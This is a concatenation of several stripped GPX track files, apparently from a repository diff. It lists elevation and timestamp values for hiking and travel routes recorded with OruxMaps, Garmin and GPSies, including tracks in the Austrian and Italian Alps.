+2015-04-22T10:54:21Z
+
+
+1705.59
+2015-04-22T10:55:57Z
+
+
+1723.06
+2015-04-22T10:58:40Z
+
+
+1738.42
+2015-04-22T11:01:02Z
+
+
+1766.98
+2015-04-22T11:05:42Z
+
+
+1777.66
+2015-04-22T11:07:18Z
+
+
+1781.68
+2015-04-22T11:07:55Z
+
+
+1777.65
+2015-04-22T11:08:57Z
+ "
+"
+
+
+2015-10-21 14:56
+
+
+
+
+
+OruxMaps
+2015-10-21T12:56:25Z
+
+
+2015-10-21 14:56
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: 2015-10-21 14:56</h2><br /><p>Startzeit: 10/21/2015 14:56</p><p>Zielzeit: 10/21/2015 16:20</p><p>Strecke: 2,9km (01:24)</p><p>Bewegungszeit: 01:00</p><p>Ø-Geschwindigkeit: 2km/h</p><p>Netto-Geschwindigkeit: 2,8km/h</p><p>Max. Geschwindigkeit: 8,1km/h</p><p>Minimale Höhe: 1979m</p><p>Maximale Höhe: 2741m</p><p>Steig-Geschw.: 112,8m/h</p><p>Sink-Geschw.: -541,9m/h</p><p>Aufstieg: 2m</p><p>Abstieg: -626m</p><p>Steigzeit: 00:01</p><p>Sinkzeit: 01:09</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2741.33
+2015-10-21T12:56:26Z
+
+
+2709.62
+2015-10-21T13:03:58Z
+
+
+2660.37
+2015-10-21T13:07:34Z
+
+
+2655.23
+2015-10-21T13:08:10Z
+
+
+2617.18
+2015-10-21T13:11:06Z
+
+
+2571.18
+2015-10-21T13:14:32Z
+
+
+2545.21
+2015-10-21T13:16:51Z
+
+
+2528.36
+2015-10-21T13:18:46Z
+
+
+2513.21
+2015-10-21T13:19:39Z
+
+
+2509.58
+2015-10-21T13:20:10Z
+
+
+2496.24
+2015-10-21T13:20:59Z
+
+
+2492.21
+2015-10-21T13:21:24Z
+
+
+2474.61
+2015-10-21T13:22:40Z
+
+
+2443.11
+2015-10-21T13:25:22Z
+
+
+2431.62
+2015-10-21T13:26:29Z
+
+
+2390.21
+2015-10-21T13:29:39Z
+
+
+2372.72
+2015-10-21T13:30:53Z
+
+
+2365.71
+2015-10-21T13:31:35Z
+
+
+2349.1
+2015-10-21T13:32:48Z
+
+
+2334.86
+2015-10-21T13:47:17Z
+
+
+2283.23
+2015-10-21T13:50:39Z
+
+
+2148.22
+2015-10-21T14:04:11Z
+
+
+2135.63
+2015-10-21T14:05:42Z
+
+
+2110.83
+2015-10-21T14:06:38Z
+
+
+2100.34
+2015-10-21T14:07:23Z
+
+
+2088.69
+2015-10-21T14:10:46Z
+
+
+2060.66
+2015-10-21T14:13:35Z
+
+
+2047.33
+2015-10-21T14:15:05Z
+
+
+1998.39
+2015-10-21T14:19:30Z
+
+
+1988.61
+2015-10-21T14:20:06Z
+
+
+1979.71
+2015-10-21T14:20:34Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-07-21T10:30:39Z
+
+2015-07-21 12:30:38
+
+
+
+
+
+
+2018.41
+2015-07-21T06:46:41Z
+
+
+2017.05
+2015-07-21T06:47:30Z
+
+
+2045.26
+2015-07-21T06:50:51Z
+
+
+2063.4
+2015-07-21T06:55:12Z
+
+
+2072.05
+2015-07-21T06:55:58Z
+
+
+2070.51
+2015-07-21T06:59:10Z
+
+
+2063.29
+2015-07-21T06:59:55Z
+
+
+2042.64
+2015-07-21T07:02:52Z
+
+
+2013.84
+2015-07-21T07:07:13Z
+
+
+2053.25
+2015-07-21T07:17:27Z
+
+
+2062.0
+2015-07-21T07:18:45Z
+
+
+2072.21
+2015-07-21T07:20:17Z
+
+
+2078.61
+2015-07-21T07:20:58Z
+
+
+2083.75
+2015-07-21T07:22:17Z
+
+
+2091.93
+2015-07-21T07:23:11Z
+
+
+2107.62
+2015-07-21T07:25:43Z
+
+
+2111.93
+2015-07-21T07:30:17Z
+
+
+2132.65
+2015-07-21T07:32:31Z
+
+
+2144.54
+2015-07-21T07:33:51Z
+
+
+2169.75
+2015-07-21T07:36:50Z
+
+
+2185.0
+2015-07-21T07:39:11Z
+
+
+2196.95
+2015-07-21T07:40:23Z
+
+
+2207.75
+2015-07-21T07:41:25Z
+
+
+2215.25
+2015-07-21T07:45:21Z
+
+
+2217.31
+2015-07-21T07:55:14Z
+
+
+2204.29
+2015-07-21T07:56:30Z
+
+
+2190.42
+2015-07-21T07:57:26Z
+
+
+2184.33
+2015-07-21T07:58:10Z
+
+
+2176.4
+2015-07-21T07:59:08Z
+
+
+2153.03
+2015-07-21T08:01:35Z
+
+
+2147.69
+2015-07-21T08:02:58Z
+
+
+2135.86
+2015-07-21T08:03:50Z
+
+
+2161.55
+2015-07-21T08:11:53Z
+
+
+2152.41
+2015-07-21T08:18:50Z
+
+
+2159.94
+2015-07-21T08:24:41Z
+
+
+2188.9
+2015-07-21T08:29:03Z
+
+
+2188.4
+2015-07-21T08:33:35Z
+
+
+2193.91
+2015-07-21T08:34:51Z
+
+
+2193.54
+2015-07-21T08:48:20Z
+
+
+2168.48
+2015-07-21T08:53:49Z
+
+
+2160.13
+2015-07-21T08:55:34Z
+
+
+2158.63
+2015-07-21T08:59:36Z
+
+
+2164.61
+2015-07-21T09:06:56Z
+
+
+2136.42
+2015-07-21T09:16:44Z
+
+
+2158.91
+2015-07-21T09:19:54Z
+
+
+2165.64
+2015-07-21T09:21:33Z
+
+
+2177.49
+2015-07-21T09:22:54Z
+
+
+2178.36
+2015-07-21T09:24:06Z
+
+
+2187.97
+2015-07-21T09:25:42Z
+
+
+2201.98
+2015-07-21T09:27:03Z
+
+
+2214.58
+2015-07-21T09:28:28Z
+
+
+2216.51
+2015-07-21T09:29:36Z
+
+
+2221.44
+2015-07-21T09:47:19Z
+
+
+2217.55
+2015-07-21T09:48:24Z
+
+
+2181.69
+2015-07-21T09:52:30Z
+
+
+2152.6
+2015-07-21T09:56:51Z
+
+
+2135.24
+2015-07-21T09:58:38Z
+
+
+2115.16
+2015-07-21T10:03:24Z
+
+
+2078.9
+2015-07-21T10:09:05Z
+
+
+2066.21
+2015-07-21T10:10:19Z
+
+
+2057.85
+2015-07-21T10:11:25Z
+
+
+2053.83
+2015-07-21T10:11:45Z
+
+
+2027.15
+2015-07-21T10:13:56Z
+
+
+2003.97
+2015-07-21T10:16:53Z
+
+
+1998.34
+2015-07-21T10:20:25Z
+
+
+1997.17
+2015-07-21T10:21:38Z
+
+
+1999.0
+2015-07-21T10:22:31Z
+
+
+2003.94
+2015-07-21T10:24:55Z
+
+
+2006.24
+2015-07-21T10:25:51Z
+
+
+2007.6
+2015-07-21T10:27:05Z
+
+
+2009.3
+2015-07-21T10:27:37Z
+
+
+2009.7
+2015-07-21T10:28:28Z
+
+
+2012.34
+2015-07-21T10:29:50Z
+
+
+2012.21
+2015-07-21T10:30:35Z
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2016-12-27T17:00:58Z
+
+GPSies Track on GPSies.com
+
+
+
+1283.0
+2010-01-01T00:00:00Z
+
+
+1285.0
+2010-01-01T00:00:14Z
+
+
+1302.0
+2010-01-01T00:00:43Z
+
+
+1352.0
+2010-01-01T00:01:44Z
+
+
+1373.0
+2010-01-01T00:02:07Z
+
+
+1383.0
+2010-01-01T00:02:22Z
+
+
+1398.0
+2010-01-01T00:02:35Z
+
+
+1445.0
+2010-01-01T00:03:18Z
+
+
+1466.0
+2010-01-01T00:03:46Z
+
+
+1490.0
+2010-01-01T00:04:26Z
+
+
+1497.0
+2010-01-01T00:04:36Z
+
+
+1525.0
+2010-01-01T00:04:50Z
+
+
+1551.0
+2010-01-01T00:05:04Z
+
+
+1575.0
+2010-01-01T00:05:19Z
+
+
+1663.0
+2010-01-01T00:06:40Z
+
+
+1693.0
+2010-01-01T00:07:00Z
+
+
+1713.0
+2010-01-01T00:07:25Z
+
+
+1745.0
+2010-01-01T00:07:51Z
+
+
+1747.0
+2010-01-01T00:08:30Z
+
+
+1800.0
+2010-01-01T00:09:02Z
+
+
+1798.0
+2010-01-01T00:09:12Z
+
+
+1826.0
+2010-01-01T00:09:34Z
+
+
+1848.0
+2010-01-01T00:10:12Z
+
+
+1854.0
+2010-01-01T00:10:24Z
+
+
+1862.0
+2010-01-01T00:10:32Z
+
+
+1877.0
+2010-01-01T00:10:50Z
+
+
+1891.0
+2010-01-01T00:11:03Z
+
+
+1915.0
+2010-01-01T00:11:18Z
+
+
+1925.0
+2010-01-01T00:11:34Z
+
+
+1929.0
+2010-01-01T00:11:40Z
+
+
+1944.0
+2010-01-01T00:12:00Z
+
+
+1947.0
+2010-01-01T00:12:07Z
+
+
+1970.0
+2010-01-01T00:12:27Z
+
+
+1973.0
+2010-01-01T00:12:35Z
+
+
+2063.0
+2010-01-01T00:14:28Z
+
+
+2065.0
+2010-01-01T00:14:44Z
+
+
+2086.0
+2010-01-01T00:15:07Z
+
+
+2111.0
+2010-01-01T00:15:28Z
+
+
+2137.0
+2010-01-01T00:15:58Z
+
+
+2160.0
+2010-01-01T00:16:20Z
+
+
+2191.0
+2010-01-01T00:16:45Z
+
+
+2205.0
+2010-01-01T00:16:56Z
+
+
+2269.0
+2010-01-01T00:18:26Z
+
+
+2281.0
+2010-01-01T00:18:38Z
+
+
+2304.0
+2010-01-01T00:19:01Z
+
+
+2305.0
+2010-01-01T00:19:07Z
+
+
+2311.0
+2010-01-01T00:19:36Z
+ "
+"
+
+
+Arita-Tour
+
+fuemm63
+
+fuemm63 on GPSies.com
+GPSiesUserOnWeb
+
+
+Arita-Tour on GPSies.com
+trackOnWeb
+2016-10-18T21:10:40Z
+
+one-way trip
+90.0
+5461.431078675756
+58.0
+138.0
+57.0
+
+Arita-Tour on GPSies.com
+
+trackOnWeb
+
+
+63.0
+2010-01-01T00:00:00Z
+
+
+63.0
+2010-01-01T00:00:05Z
+
+
+63.0
+2010-01-01T00:00:42Z
+
+
+60.0
+2010-01-01T00:01:59Z
+
+
+58.0
+2010-01-01T00:03:05Z
+
+
+68.0
+2010-01-01T00:03:52Z
+
+
+69.0
+2010-01-01T00:04:17Z
+
+
+70.0
+2010-01-01T00:04:48Z
+
+
+66.0
+2010-01-01T00:06:06Z
+
+
+65.0
+2010-01-01T00:06:47Z
+
+
+65.0
+2010-01-01T00:07:31Z
+
+
+71.0
+2010-01-01T00:08:42Z
+
+
+71.0
+2010-01-01T00:09:16Z
+
+
+71.0
+2010-01-01T00:09:53Z
+
+
+71.0
+2010-01-01T00:10:07Z
+
+
+82.0
+2010-01-01T00:12:33Z
+
+
+98.0
+2010-01-01T00:13:36Z
+
+
+100.0
+2010-01-01T00:13:42Z
+
+
+93.0
+2010-01-01T00:13:53Z
+
+
+83.0
+2010-01-01T00:14:45Z
+
+
+79.0
+2010-01-01T00:15:09Z
+
+
+79.0
+2010-01-01T00:15:17Z
+
+
+79.0
+2010-01-01T00:15:27Z
+
+
+83.0
+2010-01-01T00:16:13Z
+
+
+82.0
+2010-01-01T00:16:25Z
+
+
+86.0
+2010-01-01T00:17:35Z
+
+
+87.0
+2010-01-01T00:17:58Z
+
+
+92.0
+2010-01-01T00:19:10Z
+
+
+96.0
+2010-01-01T00:20:03Z
+
+
+97.0
+2010-01-01T00:20:25Z
+
+
+96.0
+2010-01-01T00:20:46Z
+
+
+102.0
+2010-01-01T00:21:43Z
+
+
+104.0
+2010-01-01T00:22:00Z
+
+
+110.0
+2010-01-01T00:23:22Z
+
+
+107.0
+2010-01-01T00:23:51Z
+
+
+111.0
+2010-01-01T00:24:13Z
+
+
+119.0
+2010-01-01T00:24:52Z
+
+
+124.0
+2010-01-01T00:25:12Z
+
+
+138.0
+2010-01-01T00:25:42Z
+
+
+137.0
+2010-01-01T00:26:11Z
+
+
+133.0
+2010-01-01T00:26:23Z
+
+
+135.0
+2010-01-01T00:26:52Z
+
+
+129.0
+2010-01-01T00:27:16Z
+
+
+118.0
+2010-01-01T00:27:49Z
+
+
+107.0
+2010-01-01T00:28:22Z
+
+
+104.0
+2010-01-01T00:28:32Z
+
+
+104.0
+2010-01-01T00:28:38Z
+
+
+111.0
+2010-01-01T00:30:43Z
+
+
+101.0
+2010-01-01T00:31:58Z
+
+
+99.0
+2010-01-01T00:32:25Z
+
+
+96.0
+2010-01-01T00:32:46Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-04-22T15:51:15Z
+
+
+2015-04-22 14:06:51
+
+
+
+
+
+
+1243.12
+2015-04-22T11:27:59Z
+
+
+1242.64
+2015-04-22T11:35:16Z
+
+
+1243.6
+2015-04-22T11:35:59Z
+
+
+1246.49
+2015-04-22T11:36:59Z
+
+
+1241.2
+2015-04-22T11:37:55Z
+
+
+1234.47
+2015-04-22T11:38:14Z
+
+
+1231.11
+2015-04-22T11:38:31Z
+
+
+1221.49
+2015-04-22T11:38:51Z
+
+
+1202.75
+2015-04-22T11:39:40Z
+
+
+1188.81
+2015-04-22T11:40:11Z
+
+
+1183.52
+2015-04-22T11:40:30Z
+
+
+1175.83
+2015-04-22T11:40:56Z
+
+
+1148.91
+2015-04-22T11:41:46Z
+
+
+1135.94
+2015-04-22T11:42:20Z
+
+
+1136.42
+2015-04-22T11:43:04Z
+
+
+1122.0
+2015-04-22T11:44:13Z
+
+
+1114.79
+2015-04-22T11:44:44Z
+
+
+1100.85
+2015-04-22T11:45:41Z
+
+
+1088.83
+2015-04-22T11:46:06Z
+
+
+1083.06
+2015-04-22T11:47:15Z
+
+
+1072.49
+2015-04-22T11:47:35Z
+
+
+1065.28
+2015-04-22T11:48:02Z
+
+
+1064.8
+2015-04-22T11:48:15Z
+
+
+1065.28
+2015-04-22T11:48:52Z
+
+
+1064.8
+2015-04-22T11:49:33Z
+
+
+1046.53
+2015-04-22T11:50:36Z
+
+
+1040.28
+2015-04-22T11:50:50Z
+
+
+1027.79
+2015-04-22T11:51:36Z
+
+
+1009.04
+2015-04-22T11:52:17Z
+
+
+1002.79
+2015-04-22T11:52:30Z
+
+
+993.18
+2015-04-22T11:52:58Z
+
+
+985.97
+2015-04-22T11:53:16Z
+
+
+976.84
+2015-04-22T11:53:41Z
+
+
+957.61
+2015-04-22T11:54:23Z
+
+
+946.56
+2015-04-22T11:54:51Z
+
+
+934.06
+2015-04-22T11:55:18Z
+
+
+932.14
+2015-04-22T11:55:23Z
+
+
+917.72
+2015-04-22T11:55:51Z
+
+
+908.58
+2015-04-22T11:56:15Z
+
+
+892.72
+2015-04-22T11:56:50Z
+
+
+879.26
+2015-04-22T11:57:23Z
+
+
+867.73
+2015-04-22T11:57:48Z
+
+
+858.59
+2015-04-22T11:58:58Z
+
+
+855.71
+2015-04-22T11:59:32Z
+
+
+851.87
+2015-04-22T11:59:53Z
+
+
+851.87
+2015-04-22T12:00:07Z
+
+
+848.98
+2015-04-22T12:00:44Z
+
+
+844.66
+2015-04-22T12:01:08Z
+
+
+839.37
+2015-04-22T12:01:27Z
+
+
+833.12
+2015-04-22T12:01:52Z
+
+
+831.68
+2015-04-22T12:02:03Z
+
+
+829.27
+2015-04-22T12:02:18Z
+
+
+825.91
+2015-04-22T12:02:41Z
+
+
+816.3
+2015-04-22T12:03:31Z
+
+
+813.41
+2015-04-22T12:03:58Z
+
+
+807.16
+2015-04-22T12:04:51Z
+
+
+801.88
+2015-04-22T12:05:27Z
+
+
+801.4
+2015-04-22T12:06:52Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Download GPS-Track-Analyse
+2014-07-14T07:28:32Z
+
+
+Unbenannt-Erweitert
+
+
+
+0.0
+2014-07-14T14:24:17Z
+
+
+49.0
+2014-07-14T14:27:15Z
+
+
+47.0
+2014-07-14T14:29:49Z
+
+
+51.0
+2014-07-14T14:30:47Z
+
+
+48.0
+2014-07-14T14:37:21Z
+
+
+48.0
+2014-07-14T14:42:17Z
+
+
+48.0
+2014-07-14T14:46:25Z
+
+
+48.0
+2014-07-14T14:48:38Z
+
+
+46.0
+2014-07-14T14:52:43Z
+
+
+47.0
+2014-07-14T14:59:42Z
+
+
+52.0
+2014-07-14T15:01:00Z
+
+
+55.0
+2014-07-14T15:01:51Z
+
+
+45.0
+2014-07-14T15:07:21Z
+
+
+46.0
+2014-07-14T15:10:25Z
+
+
+47.0
+2014-07-14T15:13:50Z
+
+
+45.0
+2014-07-14T15:19:40Z
+
+
+51.0
+2014-07-14T15:22:45Z
+
+
+52.0
+2014-07-14T15:25:19Z
+
+
+55.0
+2014-07-14T15:27:56Z
+
+
+53.0
+2014-07-14T15:29:42Z
+
+
+51.0
+2014-07-14T15:32:16Z
+
+
+42.0
+2014-07-14T15:39:27Z
+
+
+46.0
+2014-07-14T15:44:03Z
+
+
+48.0
+2014-07-14T15:45:38Z
+
+
+53.0
+2014-07-14T15:50:20Z
+
+
+55.0
+2014-07-14T15:53:45Z
+
+
+54.0
+2014-07-14T16:02:35Z
+
+
+54.0
+2014-07-14T16:10:33Z
+
+
+49.0
+2014-07-14T16:12:12Z
+
+
+49.0
+2014-07-14T16:12:22Z
+
+
+48.0
+2014-07-14T16:12:30Z
+
+
+48.0
+2014-07-14T16:12:48Z
+
+
+48.0
+2014-07-14T16:12:57Z
+
+
+49.0
+2014-07-14T16:14:22Z
+
+
+48.0
+2014-07-14T16:15:28Z
+
+
+48.0
+2014-07-14T16:16:41Z
+
+
+49.0
+2014-07-14T16:18:15Z
+
+
+52.0
+2014-07-14T16:20:45Z
+
+
+55.0
+2014-07-14T16:21:24Z
+
+
+56.0
+2014-07-14T16:22:42Z
+
+
+46.0
+2014-07-14T16:23:47Z
+
+
+51.0
+2014-07-14T16:25:51Z
+
+
+55.0
+2014-07-14T16:26:55Z
+
+
+54.0
+2014-07-14T16:29:02Z
+
+
+52.0
+2014-07-14T16:31:05Z
+
+
+52.0
+2014-07-14T16:32:59Z
+
+
+51.0
+2014-07-14T16:33:35Z
+
+
+52.0
+2014-07-14T16:34:27Z
+
+
+54.0
+2014-07-14T16:34:50Z
+
+
+53.0
+2014-07-14T16:36:07Z
+
+
+60.0
+2014-07-14T16:36:41Z
+
+
+55.0
+2014-07-14T16:37:05Z
+
+
+0.0
+2014-07-14T16:39:44Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+SAC Jahresbot 2018 3. Version
+
+
+
+
+
+
+SAC Jahresbot 2018 3. Version
+
+
+
+731.3
+
+
+729.6700000000001
+
+
+725.27
+
+
+724.75
+
+
+720.35
+
+
+719.5500000000001
+
+
+718.6
+
+
+717.33
+
+
+716.4200000000001
+
+
+716.4
+
+
+714.38
+
+
+713.33
+
+
+712.6199999999999
+
+
+711.28
+
+
+709.6899999999999
+
+
+708.3499999999998
+
+
+705.1199999999999
+
+
+704.06
+
+
+703.24
+
+
+701.49
+
+
+700.3000000000001
+
+
+699.1000000000001
+
+
+697.6900000000002
+
+
+696.77
+
+
+694.5500000000001
+
+
+692.5100000000001
+
+
+692.7100000000002
+
+
+690.1400000000002
+
+
+688.78
+
+
+687.63
+
+
+685.58
+
+
+685.4300000000001
+
+
+686.07
+
+
+682.63
+
+
+681.23
+
+
+679.8500000000001
+
+
+676.5600000000001
+
+
+671.5
+
+
+673.8
+
+
+675.2099999999999
+
+
+673.08
+
+
+669.5
+
+
+670.18
+
+
+670.4699999999999
+
+
+667.29
+
+
+665.35
+
+
+660.65
+
+
+659.0
+
+
+658.0
+
+
+655.6300000000001
+
+
+654.9100000000002
+
+
+649.84
+
+
+649.75
+
+
+646.45
+
+
+642.7200000000003
+
+
+643.1700000000004
+
+
+641.7600000000003
+
+
+639.8700000000003
+
+
+638.6000000000001
+
+
+638.5400000000001
+
+
+634.0000000000002
+
+
+632.5500000000003
+
+
+633.4700000000001
+
+
+631.4800000000001
+
+
+631.8000000000002
+
+
+631.3400000000001
+ "
+"
+
+
+
+
+
+
+2015-02-21T09:00:00Z
+
+24H Monte Prealba
+
+
+
+617.8
+2015-02-21T09:00:00Z
+
+
+631.2
+2015-02-21T09:01:03Z
+
+
+642.8
+2015-02-21T09:01:45Z
+
+
+650.2
+2015-02-21T09:02:17Z
+
+
+662.0
+2015-02-21T09:03:09Z
+
+
+665.2
+2015-02-21T09:03:21Z
+
+
+680.0
+2015-02-21T09:04:15Z
+
+
+699.6
+2015-02-21T09:05:26Z
+
+
+713.0
+2015-02-21T09:06:19Z
+
+
+722.0
+2015-02-21T09:06:55Z
+
+
+729.6
+2015-02-21T09:07:36Z
+
+
+733.0
+2015-02-21T09:08:02Z
+
+
+743.4
+2015-02-21T09:08:46Z
+
+
+772.2
+2015-02-21T09:10:49Z
+
+
+782.8
+2015-02-21T09:11:29Z
+
+
+795.2
+2015-02-21T09:12:19Z
+
+
+804.0
+2015-02-21T09:12:59Z
+
+
+814.0
+2015-02-21T09:13:47Z
+
+
+819.4
+2015-02-21T09:15:25Z
+
+
+841.4
+2015-02-21T09:17:50Z
+
+
+854.8
+2015-02-21T09:18:58Z
+
+
+859.4
+2015-02-21T09:19:25Z
+
+
+861.2
+2015-02-21T09:19:42Z
+
+
+891.6
+2015-02-21T09:22:19Z
+
+
+900.2
+2015-02-21T09:22:58Z
+
+
+929.4
+2015-02-21T09:25:13Z
+
+
+959.8
+2015-02-21T09:28:26Z
+
+
+984.4
+2015-02-21T09:30:36Z
+
+
+1003.2
+2015-02-21T09:32:03Z
+
+
+1029.8
+2015-02-21T09:34:10Z
+
+
+1050.6
+2015-02-21T09:35:59Z
+
+
+1066.2
+2015-02-21T09:37:17Z
+
+
+1086.4
+2015-02-21T09:38:53Z
+
+
+1096.8
+2015-02-21T09:39:35Z
+
+
+1119.8
+2015-02-21T09:41:30Z
+
+
+1133.2
+2015-02-21T09:42:42Z
+
+
+1122.2
+2015-02-21T09:43:29Z
+
+
+1105.2
+2015-02-21T09:44:14Z
+
+
+1087.8
+2015-02-21T09:45:06Z
+
+
+1084.6
+2015-02-21T09:45:13Z
+
+
+1067.8
+2015-02-21T09:46:45Z
+
+
+1047.8
+2015-02-21T09:47:55Z
+
+
+1029.0
+2015-02-21T09:49:17Z
+
+
+1015.8
+2015-02-21T09:50:01Z
+
+
+1004.0
+2015-02-21T09:50:36Z
+
+
+981.4
+2015-02-21T09:51:51Z
+
+
+960.8
+2015-02-21T09:53:02Z
+
+
+948.0
+2015-02-21T09:53:51Z
+
+
+924.4
+2015-02-21T09:54:47Z
+
+
+915.4
+2015-02-21T09:55:01Z
+
+
+883.0
+2015-02-21T09:56:32Z
+
+
+870.2
+2015-02-21T09:57:51Z
+
+
+855.4
+2015-02-21T09:58:40Z
+
+
+841.4
+2015-02-21T09:59:11Z
+
+
+814.8
+2015-02-21T10:00:16Z
+
+
+817.0
+2015-02-21T10:00:59Z
+
+
+814.4
+2015-02-21T10:01:35Z
+
+
+807.8
+2015-02-21T10:01:57Z
+
+
+797.6
+2015-02-21T10:02:22Z
+
+
+774.4
+2015-02-21T10:03:04Z
+
+
+748.4
+2015-02-21T10:03:53Z
+
+
+735.0
+2015-02-21T10:04:18Z
+
+
+729.0
+2015-02-21T10:04:43Z
+
+
+725.2
+2015-02-21T10:04:57Z
+
+
+720.2
+2015-02-21T10:05:07Z
+
+
+702.2
+2015-02-21T10:05:42Z
+
+
+686.8
+2015-02-21T10:06:14Z
+
+
+669.6
+2015-02-21T10:06:45Z
+
+
+665.0
+2015-02-21T10:06:53Z
+
+
+653.0
+2015-02-21T10:07:20Z
+
+
+645.8
+2015-02-21T10:07:35Z
+
+
+639.6
+2015-02-21T10:07:46Z
+
+
+632.8
+2015-02-21T10:07:57Z
+
+
+620.2
+2015-02-21T10:08:44Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-02-26T14:35:02Z
+
+
+2015-02-26 14:29:39
+
+
+
+
+
+
+752.85
+2015-02-26T10:29:30Z
+
+
+808.61
+2015-02-26T10:31:43Z
+
+
+811.49
+2015-02-26T10:33:56Z
+
+
+822.06
+2015-02-26T10:36:44Z
+
+
+827.83
+2015-02-26T10:38:51Z
+
+
+839.37
+2015-02-26T10:41:25Z
+
+
+854.75
+2015-02-26T10:43:20Z
+
+
+866.29
+2015-02-26T10:44:42Z
+
+
+873.5
+2015-02-26T10:45:32Z
+
+
+896.09
+2015-02-26T10:48:07Z
+
+
+911.95
+2015-02-26T10:49:55Z
+
+
+913.39
+2015-02-26T10:50:50Z
+
+
+916.75
+2015-02-26T10:51:43Z
+
+
+922.52
+2015-02-26T10:52:34Z
+
+
+928.77
+2015-02-26T10:53:22Z
+
+
+940.31
+2015-02-26T10:54:55Z
+
+
+946.07
+2015-02-26T10:55:40Z
+
+
+951.36
+2015-02-26T10:56:24Z
+
+
+978.76
+2015-02-26T10:59:37Z
+
+
+984.53
+2015-02-26T11:00:24Z
+
+
+1007.12
+2015-02-26T11:05:21Z
+
+
+1048.45
+2015-02-26T11:18:31Z
+
+
+1134.49
+2015-02-26T11:29:46Z
+
+
+1153.72
+2015-02-26T11:32:34Z
+
+
+1160.93
+2015-02-26T11:33:24Z
+
+
+1162.37
+2015-02-26T11:35:40Z
+
+
+1171.5
+2015-02-26T11:38:53Z
+
+
+1171.98
+2015-02-26T11:46:30Z
+
+
+1171.5
+2015-02-26T11:52:24Z
+
+
+1160.93
+2015-02-26T11:57:57Z
+
+
+1139.78
+2015-02-26T12:01:42Z
+
+
+1120.07
+2015-02-26T12:40:46Z
+
+
+1100.85
+2015-02-26T12:43:26Z
+
+
+1076.33
+2015-02-26T12:45:53Z
+
+
+1070.08
+2015-02-26T12:46:57Z
+
+
+1018.65
+2015-02-26T12:51:39Z
+
+
+997.51
+2015-02-26T12:55:21Z
+
+
+993.66
+2015-02-26T12:56:54Z
+
+
+991.26
+2015-02-26T12:58:24Z
+
+
+989.33
+2015-02-26T12:59:10Z
+
+
+971.55
+2015-02-26T13:01:30Z
+
+
+951.36
+2015-02-26T13:03:54Z
+
+
+947.04
+2015-02-26T13:04:19Z
+
+
+937.9
+2015-02-26T13:05:17Z
+
+
+920.12
+2015-02-26T13:09:15Z
+
+
+901.85
+2015-02-26T13:12:33Z
+
+
+896.09
+2015-02-26T13:13:46Z
+
+
+881.19
+2015-02-26T13:15:57Z
+
+
+880.22
+2015-02-26T13:16:31Z
+
+
+874.94
+2015-02-26T13:17:42Z
+
+
+863.88
+2015-02-26T13:19:02Z
+
+
+852.35
+2015-02-26T13:20:26Z
+
+
+847.06
+2015-02-26T13:21:14Z
+
+
+835.52
+2015-02-26T13:24:04Z
+
+
+825.91
+2015-02-26T13:26:56Z
+
+
+821.1
+2015-02-26T13:27:52Z
+
+
+820.14
+2015-02-26T13:29:29Z
+ "
+"
+
+
+
+
+
+
+CompeGPS TEAM, SL
+2014-10-06T15:14:10Z
+
+
+Aufstiegstrack Hochobir
+
+
+
+1555.4
+2014-10-06T10:54:23Z
+
+5
+
+
+
+
+1566.8
+2014-10-06T10:56:03Z
+
+5
+
+
+
+
+1575.0
+2014-10-06T10:57:17Z
+
+4
+
+
+
+
+1598.2
+2014-10-06T10:59:09Z
+
+5
+
+
+
+
+1616.2
+2014-10-06T10:59:59Z
+
+5
+
+
+
+
+1637.1
+2014-10-06T11:00:44Z
+
+5
+
+
+
+
+1647.9
+2014-10-06T11:01:21Z
+
+5
+
+
+
+
+1668.0
+2014-10-06T11:04:30Z
+
+3
+
+
+
+
+1686.0
+2014-10-06T11:07:16Z
+
+4
+
+
+
+
+1700.4
+2014-10-06T11:09:40Z
+
+5
+
+
+
+
+1728.7
+2014-10-06T11:11:13Z
+
+5
+
+
+
+
+1739.7
+2014-10-06T11:12:12Z
+
+5
+
+
+
+
+1755.2
+2014-10-06T11:13:33Z
+
+5
+
+
+
+
+1768.0
+2014-10-06T11:15:16Z
+
+4
+
+
+
+
+1783.9
+2014-10-06T11:16:59Z
+
+5
+
+
+
+
+1794.3
+2014-10-06T11:18:18Z
+
+5
+
+
+
+
+1803.3
+2014-10-06T11:21:43Z
+
+5
+
+
+
+
+1833.4
+2014-10-06T11:24:13Z
+
+6
+
+
+
+
+1828.6
+2014-10-06T11:25:39Z
+
+8
+
+
+
+
+1861.0
+2014-10-06T11:31:03Z
+
+8
+
+
+
+
+1895.6
+2014-10-06T11:32:57Z
+
+7
+
+
+
+
+1972.3
+2014-10-06T11:40:00Z
+
+7
+
+
+
+
+2016.1
+2014-10-06T11:43:39Z
+
+7
+
+
+
+
+2012.7
+2014-10-06T11:45:59Z
+
+9
+
+
+
+
+2026.6
+2014-10-06T11:47:43Z
+
+7
+
+
+
+
+2045.9
+2014-10-06T11:49:53Z
+
+8
+
+
+
+
+2061.1
+2014-10-06T11:52:39Z
+
+8
+
+
+
+
+2099.3
+2014-10-06T11:54:59Z
+
+7
+
+
+
+
+2077.5
+2014-10-06T12:22:42Z
+
+9
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-08-03T21:00:26Z
+
+
+Gasthof Gosausee bis Gasthof Gosausee
+
+
+
+
+
+927.23828125
+2015-08-03T20:23:23Z
+Gasthof Gosausee
+Gasthof Gosausee
+Gasthof Gosausee
+
+Waypoint
+
+
+
+
+1984.546875
+2015-08-03T20:23:27Z
+Steiglpass (2018m)
+Steiglpass (2018m)
+Steiglpass (2018m)
+
+Waypoint
+
+
+
+
+1699.11328125
+2015-08-03T20:23:33Z
+Hofpürglhütte
+Hofpürglhütte
+Hofpürglhütte
